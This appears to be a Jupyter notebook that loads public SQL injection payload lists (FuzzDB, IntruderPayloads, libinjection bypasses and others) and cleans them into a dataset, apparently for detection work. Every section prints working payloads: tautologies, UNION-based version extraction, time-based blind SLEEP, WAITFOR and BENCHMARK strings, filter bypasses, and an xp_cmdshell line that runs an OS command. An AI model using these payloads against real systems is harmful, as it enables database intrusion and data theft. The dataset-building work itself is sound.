In [85]:
import pandas as pd
import os
import nltk 
from nltk.corpus import stopwords

Cleaning data function:

In [5]:
def cleanData(data):
    for i in range(len(data)):
        data[i]=data[i].replace('\n', '')
        data[i]=data[i].replace('%20', ' ')
        data[i]=data[i].replace('=', ' = ')
        data[i]=data[i].replace('((', ' (( ')
        data[i]=data[i].replace('))', ' )) ')
        data[i]=data[i].replace('(', ' ( ')
        data[i]=data[i].replace(')', ' ) ')
        
    return data

# 1) OWASP JBroFuzz

1.1) owasp/jbrofuzz

source: https://github.com/foospidy/payloads/blob/master/owasp/jbrofuzz/sqli.txt

In [7]:
path='./dataset/collected payloads/OWASP/foospidy-sqli.txt'
sqliList=[]
file= open(path, "r") # open file with a mode=r (read only mode
for i in file:
    sqliList.append(i)

In [8]:
sqliList[0:20]

['a\n',
 "a' \n",
 "a' --\n",
 "a' or 1=1; --\n",
 '@\n',
 '?\n',
 "' and 1=0) union all\n",
 '? or 1=1 --\n',
 "x' and userid is NULL; --\n",
 "x' and email is NULL; --\n",
 "anything' or 'x'='x\n",
 "x' and 1=(select count(*) from tabname); --\n",
 "x' and members.email is NULL; --\n",
 "x' or full_name like '%bob%\n",
 '23 or 1=1; --\n',
 "'; exec master..xp_cmdshell 'ping 172.10.1.255'--\n",
 'a\n',
 '1 or 1=1\n',
 "1' or '1'='1\n",
 "1 and user_name() = 'dbo'\n"]

In [9]:
foospidy_sqli= cleanData(sqliList)

In [10]:
foospidy_sqli[0:20]

['a',
 "a' ",
 "a' --",
 "a' or 1 = 1; --",
 '@',
 '?',
 "' and 1 = 0 )  union all",
 '? or 1 = 1 --',
 "x' and userid is NULL; --",
 "x' and email is NULL; --",
 "anything' or 'x' = 'x",
 "x' and 1 =  ( select count ( * )  from tabname ) ; --",
 "x' and members.email is NULL; --",
 "x' or full_name like '%bob%",
 '23 or 1 = 1; --',
 "'; exec master..xp_cmdshell 'ping 172.10.1.255'--",
 'a',
 '1 or 1 = 1',
 "1' or '1' = '1",
 "1 and user_name (  )   =  'dbo'"]

1.2) libinjection
source: https://github.com/foospidy/payloads/blob/master/other/sqli/libinjection-bypasses.txt

In [1]:
path='./dataset/collected payloads/OWASP/libinjection-bypasses.txt'
sqliList=[]
file= open(path, "r") # open file with a mode=r (read only mode
for i in file:
    sqliList.append(i)

In [2]:
sqliList[0:20]

['&()o1: select * from users where id=1 or (\\)=1 union select 1,@@VERSION -- 1\n',
 '&(.)o: select * from users where id=1 or (\\.)=1 union select 1,@@VERSION -- 1\n',
 '&(1&1: select * from users where id=1 or (\\+)=1 or 1=1 -- 1\n',
 '&(1)o: select * from users where id=1 or (1)=1 union select 1,banner from v$version where rownum=1 -- 1\n',
 '&(1UE: select * from users where id=1 or (\\+)=1 union select 1,@@VERSION -- 1\n',
 '&(n&1: select * from users where id=1 or ($+)=1 or 1=1 -- 1\n',
 '&(nUE: select * from users where id=1 or ($+)=1 union select 1,@@VERSION -- 1\n',
 '&.o&1: select * from users where id=1 or \\.<\\ or 1=1 -- 1\n',
 '&.o1&: select * from users where id=1 or \\.<1 or 1=1 -- 1\n',
 '&.o1U: select * from users where id=1 or \\.<1 union select 1,@@VERSION -- 1\n',
 '&.oUE: select * from users where id=1 or \\.<\\ union select 1,@@VERSION -- 1\n',
 '&.on&: select * from users where id=1 or \\.<$ or 1=1 -- 1\n',
 '&.onU: select * from users where id=1 or \\.<$ union select 1,@@VERSION -- 1\n',
 '&.oo1: select * from users where id=1 or \\.< =1 union select 1,@@VERSION -- 1\n',
 '&1UE1: select * from users where id=1 ||1 union select 1,banner from v$version where rownum=1 -- 1\n',
 '&1UEv: select * from users where id=1 ||1 union select null,banner from v$version where rownum=1 -- 1\n',
 '&1c: select * from users where id=1   or 1=1 -- 1\n',
 '&1oo&: select * from users where id=1 or \\+<\\ or 1=1 -- 1\n',
 '&1oo1: select * from users where id=1 or  1<@=1 union select 1,version() -- 1\n',
 '&1ooU: select * from users where id=1 or \\+<\\ union select 1,@@VERSION -- 1\n']

In [6]:
libinjection_sqli= cleanData(sqliList)
libinjection_sqli[0:20]

['& (  ) o1: select * from users where id = 1 or  ( \\ )  = 1 union select 1,@@VERSION -- 1',
 '& ( . ) o: select * from users where id = 1 or  ( \\. )  = 1 union select 1,@@VERSION -- 1',
 '& ( 1&1: select * from users where id = 1 or  ( \\+ )  = 1 or 1 = 1 -- 1',
 '& ( 1 ) o: select * from users where id = 1 or  ( 1 )  = 1 union select 1,banner from v$version where rownum = 1 -- 1',
 '& ( 1UE: select * from users where id = 1 or  ( \\+ )  = 1 union select 1,@@VERSION -- 1',
 '& ( n&1: select * from users where id = 1 or  ( $+ )  = 1 or 1 = 1 -- 1',
 '& ( nUE: select * from users where id = 1 or  ( $+ )  = 1 union select 1,@@VERSION -- 1',
 '&.o&1: select * from users where id = 1 or \\.<\\ or 1 = 1 -- 1',
 '&.o1&: select * from users where id = 1 or \\.<1 or 1 = 1 -- 1',
 '&.o1U: select * from users where id = 1 or \\.<1 union select 1,@@VERSION -- 1',
 '&.oUE: select * from users where id = 1 or \\.<\\ union select 1,@@VERSION -- 1',
 '&.on&: select * from users where id = 1 or \\.<$ or 1 = 1 -- 1',
 '&.onU: select * from users where id = 1 or \\.<$ union select 1,@@VERSION -- 1',
 '&.oo1: select * from users where id = 1 or \\.<  = 1 union select 1,@@VERSION -- 1',
 '&1UE1: select * from users where id = 1 ||1 union select 1,banner from v$version where rownum = 1 -- 1',
 '&1UEv: select * from users where id = 1 ||1 union select null,banner from v$version where rownum = 1 -- 1',
 '&1c: select * from users where id = 1   or 1 = 1 -- 1',
 '&1oo&: select * from users where id = 1 or \\+<\\ or 1 = 1 -- 1',
 '&1oo1: select * from users where id = 1 or  1<@ = 1 union select 1,version (  )  -- 1',
 '&1ooU: select * from users where id = 1 or \\+<\\ union select 1,@@VERSION -- 1']

1.3) camoufl4g3 

Source: https://github.com/foospidy/payloads/blob/master/other/sqli/camoufl4g3.txt

In [11]:
path='./dataset/collected payloads/OWASP/camoufl4g3.txt'
sqliList=[]
file= open(path, "r") # open file with a mode=r (read only mode
for i in file:
    sqliList.append(i)

In [12]:
sqliList[0:20]

["'-'\n",
 "' '\n",
 "'&'\n",
 "'^'\n",
 "'*'\n",
 "' or ''-'\n",
 "' or '' '\n",
 "' or ''&'\n",
 "' or ''^'\n",
 "' or ''*'\n",
 '"-"\n',
 '" "\n',
 '"&"\n',
 '"^"\n',
 '"*"\n',
 '" or ""-"\n',
 '" or "" "\n',
 '" or ""&"\n',
 '" or ""^"\n',
 '" or ""*"\n']

In [13]:
camoufl4g3_sqli= cleanData(sqliList)
camoufl4g3_sqli[0:20]

["'-'",
 "' '",
 "'&'",
 "'^'",
 "'*'",
 "' or ''-'",
 "' or '' '",
 "' or ''&'",
 "' or ''^'",
 "' or ''*'",
 '"-"',
 '" "',
 '"&"',
 '"^"',
 '"*"',
 '" or ""-"',
 '" or "" "',
 '" or ""&"',
 '" or ""^"',
 '" or ""*"']

# 2) Kali Linux Burp Suite :

2.1) sqli-error-based

source: https://github.com/1N3/IntruderPayloads/blob/master/FuzzLists/sqli-error-based.txt

In [15]:
path='./dataset/collected payloads/kali-linux-burp-suite/sqli-error-based.txt'
sqliList=[]
file= open(path, "r") # open file with a mode=r (read only mode
for i in file:
    sqliList.append(i)

In [16]:
sqliList[0:20]

[' OR 1=1\n',
 ' OR 1=0\n',
 ' OR x=x\n',
 ' OR x=y\n',
 ' OR 1=1#\n',
 ' OR 1=0#\n',
 ' OR x=x#\n',
 ' OR x=y#\n',
 ' OR 1=1-- \n',
 ' OR 1=0-- \n',
 ' OR x=x-- \n',
 ' OR x=y-- \n',
 " OR 3409=3409 AND ('pytW' LIKE 'pytW\n",
 " OR 3409=3409 AND ('pytW' LIKE 'pytY\n",
 ' HAVING 1=1\n',
 ' HAVING 1=0\n',
 ' HAVING 1=1#\n',
 ' HAVING 1=0#\n',
 ' HAVING 1=1-- \n',
 ' HAVING 1=0-- \n']

In [17]:
Burp_sqli_error_based= cleanData(sqliList)
Burp_sqli_error_based[0:20]

[' OR 1 = 1',
 ' OR 1 = 0',
 ' OR x = x',
 ' OR x = y',
 ' OR 1 = 1#',
 ' OR 1 = 0#',
 ' OR x = x#',
 ' OR x = y#',
 ' OR 1 = 1-- ',
 ' OR 1 = 0-- ',
 ' OR x = x-- ',
 ' OR x = y-- ',
 " OR 3409 = 3409 AND  ( 'pytW' LIKE 'pytW",
 " OR 3409 = 3409 AND  ( 'pytW' LIKE 'pytY",
 ' HAVING 1 = 1',
 ' HAVING 1 = 0',
 ' HAVING 1 = 1#',
 ' HAVING 1 = 0#',
 ' HAVING 1 = 1-- ',
 ' HAVING 1 = 0-- ']

2.2) sqli-time-based

source: https://github.com/1N3/IntruderPayloads/blob/master/FuzzLists/sqli-time-based.txt

In [18]:
path='./dataset/collected payloads/kali-linux-burp-suite/sqli-time-based.txt'
sqliList=[]
file= open(path, "r") # open file with a mode=r (read only mode
for i in file:
    sqliList.append(i)

In [19]:
sqliList[0:20]

[" AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe\n",
 " AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='\n",
 ' AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)\n',
 ' AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--\n',
 ' AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#\n',
 'SLEEP(5)#\n',
 'SLEEP(5)-- \n',
 'SLEEP(5)="\n',
 "SLEEP(5)='\n",
 ' or SLEEP(5)\n',
 ' or SLEEP(5)#\n',
 ' or SLEEP(5)--\n',
 ' or SLEEP(5)="\n',
 " or SLEEP(5)='\n",
 "waitfor delay '00:00:05'\n",
 "waitfor delay '00:00:05'-- \n",
 "waitfor delay '00:00:05'#\n",
 'benchmark(50000000,MD5(1))\n',
 'benchmark(50000000,MD5(1))-- \n',
 'benchmark(50000000,MD5(1))#\n']

In [20]:
Burp_sqli_time_based= cleanData(sqliList)
Burp_sqli_time_based[0:20]

[" AND  ( SELECT * FROM  ( SELECT ( SLEEP ( 5  )  )   ) bAKL )  AND 'vRxe' = 'vRxe",
 " AND  ( SELECT * FROM  ( SELECT ( SLEEP ( 5  )  )   ) YjoC )  AND '%' = '",
 ' AND  ( SELECT * FROM  ( SELECT ( SLEEP ( 5  )  )   ) nQIP ) ',
 ' AND  ( SELECT * FROM  ( SELECT ( SLEEP ( 5  )  )   ) nQIP ) --',
 ' AND  ( SELECT * FROM  ( SELECT ( SLEEP ( 5  )  )   ) nQIP ) #',
 'SLEEP ( 5 ) #',
 'SLEEP ( 5 ) -- ',
 'SLEEP ( 5 )  = "',
 "SLEEP ( 5 )  = '",
 ' or SLEEP ( 5 ) ',
 ' or SLEEP ( 5 ) #',
 ' or SLEEP ( 5 ) --',
 ' or SLEEP ( 5 )  = "',
 " or SLEEP ( 5 )  = '",
 "waitfor delay '00:00:05'",
 "waitfor delay '00:00:05'-- ",
 "waitfor delay '00:00:05'#",
 'benchmark ( 50000000,MD5 ( 1  )  )  ',
 'benchmark ( 50000000,MD5 ( 1  )  )  -- ',
 'benchmark ( 50000000,MD5 ( 1  )  )  #']

2.3) sqli-union-select

source: https://github.com/1N3/IntruderPayloads/blob/master/FuzzLists/sqli-union-select.txt

In [21]:
path='./dataset/collected payloads/kali-linux-burp-suite/sqli-union-select.txt'
sqliList=[]
file= open(path, "r") # open file with a mode=r (read only mode
for i in file:
    sqliList.append(i)

In [22]:
sqliList[0:20]

[' ORDER BY SLEEP(5)\n',
 ' ORDER BY 1,SLEEP(5)\n',
 " ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))\n",
 " ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4\n",
 " ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5\n",
 " ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6\n",
 " ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7\n",
 " ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8\n",
 " ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9\n",
 " ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10\n",
 " ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11\n",
 " ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12\n",
 " ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13\n",
 " ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14\n",
 " ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14\n",
 " ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15\n",
 " ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16\n",
 " ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17\n",
 " ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18\n",
 " ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19\n"]

In [23]:
Burp_sqli_union_select= cleanData(sqliList)
Burp_sqli_union_select[0:20]

[' ORDER BY SLEEP ( 5 ) ',
 ' ORDER BY 1,SLEEP ( 5 ) ',
 " ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ",
 " ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4",
 " ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5",
 " ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6",
 " ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7",
 " ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8",
 " ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9",
 " ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10",
 " ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11",
 " ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12",
 " ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13",
 " ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13,14",
 " ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13,14",
 " ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13,14,15",
 " ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13,14,15,16",
 " ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13,14,15,16,17",
 " ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18",
 " ORDER BY 1,SLEEP ( 5 ) ,BENCHMARK ( 1000000,MD5 ( 'A'  )  )  ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19"]

2.4) sqli-escape-chars

source: https://github.com/1N3/IntruderPayloads/blob/master/FuzzLists/sqli_escape_chars.txt

In [24]:
path='./dataset/collected payloads/kali-linux-burp-suite/sqli_escape_chars.txt'
sqliList=[]
file= open(path, "r") # open file with a mode=r (read only mode
for i in file:
    sqliList.append(i)

In [25]:
sqliList[0:20]

["'\n",
 '"\n',
 "''\n",
 '\'"\n',
 ';\n',
 '\n',
 ')\n',
 "')\n",
 '")\n',
 '");\n',
 "';\n",
 '";\n',
 "%'\n",
 '%"\n',
 "%')\n",
 '%")\n',
 "'))\n",
 '"))\n',
 '")))\n',
 '\n']

In [26]:
Burp_sqli_escape_chars= cleanData(sqliList)
Burp_sqli_escape_chars[0:20]

["'",
 '"',
 "''",
 '\'"',
 ';',
 '',
 ' ) ',
 "' ) ",
 '" ) ',
 '" ) ;',
 "';",
 '";',
 "%'",
 '%"',
 "%' ) ",
 '%" ) ',
 "'  )  )  ",
 '"  )  )  ',
 '"  )  )   ) ',
 '']

# 3) FuzzDB :

3.1) GenericBlind

source: https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/sql-injection/detect/GenericBlind.txt

In [27]:
path='./dataset/collected payloads/FuzzDB/GenericBlind.txt'
sqliList=[]
file= open(path, "r") # open file with a mode=r (read only mode
for i in file:
    sqliList.append(i)

In [28]:
sqliList[0:20]

['sleep(__TIME__)#\n',
 '1 or sleep(__TIME__)#\n',
 '" or sleep(__TIME__)#\n',
 "' or sleep(__TIME__)#\n",
 '" or sleep(__TIME__)="\n',
 "' or sleep(__TIME__)='\n",
 '1) or sleep(__TIME__)#\n',
 '") or sleep(__TIME__)="\n',
 "') or sleep(__TIME__)='\n",
 '1)) or sleep(__TIME__)#\n',
 '")) or sleep(__TIME__)="\n',
 "')) or sleep(__TIME__)='\n",
 ";waitfor delay '0:0:__TIME__'--\n",
 ");waitfor delay '0:0:__TIME__'--\n",
 "';waitfor delay '0:0:__TIME__'--\n",
 '";waitfor delay \'0:0:__TIME__\'--\n',
 "');waitfor delay '0:0:__TIME__'--\n",
 '");waitfor delay \'0:0:__TIME__\'--\n',
 "));waitfor delay '0:0:__TIME__'--\n",
 "'));waitfor delay '0:0:__TIME__'--\n"]

In [29]:
FuzzDB_GenericBlind= cleanData(sqliList)
FuzzDB_GenericBlind[0:20]

['sleep ( __TIME__ ) #',
 '1 or sleep ( __TIME__ ) #',
 '" or sleep ( __TIME__ ) #',
 "' or sleep ( __TIME__ ) #",
 '" or sleep ( __TIME__ )  = "',
 "' or sleep ( __TIME__ )  = '",
 '1 )  or sleep ( __TIME__ ) #',
 '" )  or sleep ( __TIME__ )  = "',
 "' )  or sleep ( __TIME__ )  = '",
 '1  )  )   or sleep ( __TIME__ ) #',
 '"  )  )   or sleep ( __TIME__ )  = "',
 "'  )  )   or sleep ( __TIME__ )  = '",
 ";waitfor delay '0:0:__TIME__'--",
 " ) ;waitfor delay '0:0:__TIME__'--",
 "';waitfor delay '0:0:__TIME__'--",
 '";waitfor delay \'0:0:__TIME__\'--',
 "' ) ;waitfor delay '0:0:__TIME__'--",
 '" ) ;waitfor delay \'0:0:__TIME__\'--',
 "  )  )  ;waitfor delay '0:0:__TIME__'--",
 "'  )  )  ;waitfor delay '0:0:__TIME__'--"]

3.2) payloads-sql-blind-MSSQL-INSERT

source: https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/sql-injection/payloads-sql-blind/payloads-sql-blind-MSSQL-INSERT.txt

In [31]:
path='./dataset/collected payloads/FuzzDB/payloads-sql-blind-MSSQL-INSERT.txt'
sqliList=[]
file= open(path, "r") # open file with a mode=r (read only mode
for i in file:
    sqliList.append(i)

In [32]:
sqliList[0:20]

[")%20waitfor%20delay%20'0:0:20'%20/*\n",
 ")%20waitfor%20delay%20'0:0:20'%20--\n",
 "')%20waitfor%20delay%20'0:0:20'%20/*\n",
 "')%20waitfor%20delay%20'0:0:20'%20--\n",
 '")%20waitfor%20delay%20\'0:0:20\'%20/*\n',
 '")%20waitfor%20delay%20\'0:0:20\'%20--\n',
 "))%20waitfor%20delay%20'0:0:20'%20/*\n",
 "))%20waitfor%20delay%20'0:0:20'%20--\n",
 "'))%20waitfor%20delay%20'0:0:20'%20/*\n",
 "'))%20waitfor%20delay%20'0:0:20'%20--\n",
 '"))%20waitfor%20delay%20\'0:0:20\'%20/*\n',
 '"))%20waitfor%20delay%20\'0:0:20\'%20--\n',
 ",NULL)%20waitfor%20delay%20'0:0:20'%20/*\n",
 ",NULL)%20waitfor%20delay%20'0:0:20'%20--\n",
 "',NULL)%20waifor%20delay%20'0:0:20'%20/*\n",
 "',NULL)%20waitfor%20delay%20'0:0:20'%20--\n",
 '",NULL)%20waitfor%20delay%20\'0:0:20\'%20/*\n',
 '",NULL)%20waitfor%20delay%20\'0:0:20\'%20--\n',
 "),NULL)%20waitfor%20delay%20'0:0:20'%20/*\n",
 "),NULL)%20waitfor%20delay%20'0:0:20'%20--\n"]

In [34]:
FuzzDB_payloads_sql_blind_MSSQL_INSERT= cleanData(sqliList)
FuzzDB_payloads_sql_blind_MSSQL_INSERT[0:20]

[" )  waitfor delay '0:0:20' /*",
 " )  waitfor delay '0:0:20' --",
 "' )  waitfor delay '0:0:20' /*",
 "' )  waitfor delay '0:0:20' --",
 '" )  waitfor delay \'0:0:20\' /*',
 '" )  waitfor delay \'0:0:20\' --',
 "  )  )   waitfor delay '0:0:20' /*",
 "  )  )   waitfor delay '0:0:20' --",
 "'  )  )   waitfor delay '0:0:20' /*",
 "'  )  )   waitfor delay '0:0:20' --",
 '"  )  )   waitfor delay \'0:0:20\' /*',
 '"  )  )   waitfor delay \'0:0:20\' --',
 ",NULL )  waitfor delay '0:0:20' /*",
 ",NULL )  waitfor delay '0:0:20' --",
 "',NULL )  waifor delay '0:0:20' /*",
 "',NULL )  waitfor delay '0:0:20' --",
 '",NULL )  waitfor delay \'0:0:20\' /*',
 '",NULL )  waitfor delay \'0:0:20\' --',
 " ) ,NULL )  waitfor delay '0:0:20' /*",
 " ) ,NULL )  waitfor delay '0:0:20' --"]

3.3) payloads-sql-blind-MSSQL-WHERE

source: https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/sql-injection/payloads-sql-blind/payloads-sql-blind-MSSQL-WHERE.txt

In [35]:
path='./dataset/collected payloads/FuzzDB/payloads-sql-blind-MSSQL-WHERE.txt'
sqliList=[]
file= open(path, "r") # open file with a mode=r (read only mode
for i in file:
    sqliList.append(i)

In [36]:
sqliList[0:20]

[" waitfor delay '0:0:20' /* \n",
 " waitfor delay '0:0:20' --\n",
 "' waitfor delay '0:0:20' /* \n",
 "' waitfor delay '0:0:20' --\n",
 '" waitfor delay \'0:0:20\' /* \n',
 '" waitfor delay \'0:0:20\' --\n',
 ") waitfor delay '0:0:20' /* \n",
 ") waitfor delay '0:0:20' --\n",
 ")) waitfor delay '0:0:20' /* \n",
 ")) waitfor delay '0:0:20' --\n",
 "))) waitfor delay '0:0:20' /* \n",
 "))) waitfor delay '0:0:20' --\n",
 ")))) waitfor delay '0:0:20' /* \n",
 ")))) waitfor delay '0:0:20' --\n",
 "))))) waitfor delay '0:0:20' --\n",
 ")))))) waitfor delay '0:0:20' --\n",
 "') waitfor delay '0:0:20' /* \n",
 "') waitfor delay '0:0:20' --\n",
 '") waitfor delay \'0:0:20\' /* \n',
 '") waitfor delay \'0:0:20\' --\n']

In [37]:
FuzzDB_payloads_sql_blind_MSSQL_WHERE= cleanData(sqliList)
FuzzDB_payloads_sql_blind_MSSQL_WHERE[0:20]

[" waitfor delay '0:0:20' /* ",
 " waitfor delay '0:0:20' --",
 "' waitfor delay '0:0:20' /* ",
 "' waitfor delay '0:0:20' --",
 '" waitfor delay \'0:0:20\' /* ',
 '" waitfor delay \'0:0:20\' --',
 " )  waitfor delay '0:0:20' /* ",
 " )  waitfor delay '0:0:20' --",
 "  )  )   waitfor delay '0:0:20' /* ",
 "  )  )   waitfor delay '0:0:20' --",
 "  )  )   )  waitfor delay '0:0:20' /* ",
 "  )  )   )  waitfor delay '0:0:20' --",
 "  )  )    )  )   waitfor delay '0:0:20' /* ",
 "  )  )    )  )   waitfor delay '0:0:20' --",
 "  )  )    )  )   )  waitfor delay '0:0:20' --",
 "  )  )    )  )    )  )   waitfor delay '0:0:20' --",
 "' )  waitfor delay '0:0:20' /* ",
 "' )  waitfor delay '0:0:20' --",
 '" )  waitfor delay \'0:0:20\' /* ',
 '" )  waitfor delay \'0:0:20\' --']

3.4) payloads-sql-blind-MySQL-INSERT

source: https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/sql-injection/payloads-sql-blind/payloads-sql-blind-MySQL-INSERT.txt

In [38]:
path='./dataset/collected payloads/FuzzDB/payloads-sql-blind-MySQL-INSERT.txt'
sqliList=[]
file= open(path, "r") # open file with a mode=r (read only mode
for i in file:
    sqliList.append(i)

In [39]:
sqliList[0:20]

['+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*\n',
 '+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--\n',
 '+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23\n',
 "'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*\n",
 "'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--\n",
 "'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23\n",
 '"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*\n',
 '"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--\n',
 '"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23\n',
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/* \n',
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--\n',
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23\n',
 "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/* \n",
 "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--\n",
 "'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23\n",
 '"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/* \n',
 '"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--\n',
 '"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23\n',
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*\n',
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--\n']

In [40]:
FuzzDB_payloads_sql_blind_MySQL_INSERT= cleanData(sqliList)
FuzzDB_payloads_sql_blind_MySQL_INSERT[0:20]

['+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL  )  )   /*',
 '+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL  )  )   --',
 '+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL  )  )   %23',
 "'+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL  )  )   /*",
 "'+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL  )  )   --",
 "'+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL  )  )   %23",
 '"+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL  )  )   /*',
 '"+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL  )  )   --',
 '"+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL  )  )   %23',
 '+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL )  /* ',
 '+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL )  --',
 '+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL )  %23',
 "'+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL )  /* ",
 "'+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL )  --",
 "'+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL )  %23",
 '"+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL )  /* ',
 '"+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL )  --',
 '"+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL )  %23',
 '+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL,NULL )  /*',
 '+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL,NULL )  --']

3.5) payloads-sql-blind-MySQL-ORDER-BY

source: https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/sql-injection/payloads-sql-blind/payloads-sql-blind-MySQL-ORDER_BY.txt

In [41]:
path='./dataset/collected payloads/FuzzDB/payloads-sql-blind-MySQL-ORDER_BY.txt'
sqliList=[]
file= open(path, "r") # open file with a mode=r (read only mode
for i in file:
    sqliList.append(i)

In [42]:
sqliList[0:20]

[',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*\n',
